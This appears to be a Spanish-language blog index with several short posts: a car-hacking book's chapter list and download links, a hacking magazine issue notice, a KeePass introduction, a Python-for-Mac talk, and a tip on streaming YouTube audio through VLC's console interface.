  • Vehicle Communication Systems
  • Engine Control Unit
  • CAN Bus Reversing Methodology
  • Breaking the Vehicle
  • CAN Bus Tools
  • Weaponizing CAN Findings
  • Attacking TPMS
  • Ethernet Attacks
  • Attacking Keyfobs and Immobilizers
  • FLASHBACK - Hotwiring
  • Attacking ECUs and other Embedded Systems
  • What does your hacker garage need?
Pero que va, para un después  podemos descargarlo gratis en PDF o ePub.

Download


Purchase

Si lo quieren en forma fisica o para el Kindle y demas detalles ;)
Algunas utilidades interesantes, que pueden servir.

http://opengarages.org/index.php/Tools

Repito alguien quiere meter mano al coche que tenga todo lo necesario xDDD.

Regards,
Snifer
Leer Mas

Este mes, Eugenia Bahit ( @eugeniabahit ) no mando el correo respectivo, como todos los meses xD y esta entrada andaba por ahí dormida me olvide por completo traerla aquí al blog, por lo cual ahora si sale ;) mas vale tarde que nunca,

  • Europio Engine Lab: URL customizables y slugs en Europio Engine
  • Ingeniería de Software y estructura de directorios definitivas en aplicaciones MVC modulares.
  • Hack para emular la autocarga y desactivación de módulos de un sistema como política de emergencia frente a fallos inesperados.
  • Ese Captcha no verifica a los humanos, sino que comprueba su miopía. 
Descarga la revista  The Original Hacker N° 7

Las revistas anteriores:






    Regards,
    Snifer
    Leer Mas
    ¿Qué es y cómo se usa KeePass?KeePass es un gestor de contraseñas que se utiliza para almacenar usuarios y contraseñas. una gran cantidad de parejas usuario/contraseña. La base de datos donde se guarda esta información está cifrada mediante una única clave (contraseña maestra o en inglés master password), de forma que el usuario sólo tenga que memorizar una clave para acceder a todas las demás.

    Esto facilita la administración de contraseñas y fomenta que los usuarios escojan claves complejas sin miedo a no ser capaces de recordarlas posteriormente.

    En Arch basta con instalarlo y ya tendremos listo para almacenar nuestras contraseñas lo uso en el trabajo en entorno Windows, como tambien mi Manjaro antes lo llevaba en mi Droid pero desde que paso a mejor vida, ya no seria bueno hacer un fork por así decirlo, mejor dicho  seria portar a FirefoxOS.

    KeePass

    Regards,
    Snifer
    Leer Mas
    Jeremy Reichman, y  Nate Walck dan una inmersion en el uso de Python para los administradores de sistemas que hacen uso de las MaC :P, una interesante charla que es del año pasado, espero la disfruten como la disfrute el dia Sabado, buen inicio de semana.



    Para los que quieran tener el Slide mas aqui lo pueden descargar.

    Regards,
    Snifer
    Leer Mas
    Hoy ando estudiando como chino leyendo material sobre Android, aprendiendo ya que tengo un mes para aprender y hacerlo bien, es por ello que estuve hoy con mi querida trabajando en ese ajetreo estuvimos escuchando música de los 90's aunque suene raro parecemos viejos U_u esa si era música no el regueton de ahora pero bueno, para gustos no hay disgustos.

    Así que  nos fuimos a youtube, y dije no necesito ver ¬_¬° solo necesito escuchar, por ello se me vino a la mente el querido VLC, que tiene por cierto su versión por consola así que entre probando y probando dí con lo que quería poder realizar el stream, del video via la consola, para ello tenemos que tener instalado el sepsi VLC, acceder a una terminal y dar el siguiente comando:
    [snifer@rizel Desktop]$ vlc -I ncurses https://www.youtube.com/watch?v=wPT-YdNLxCs
    

    Tras ello tendremos el siguiente resultado y wallla :D música de Youtube desde la consola ;).



    PD: Posteo ahora porque mi querida anda con ganas de molestarme queriendo postear primero muajaajjaja :3

    Regards,
    Snifer
    Leer Mas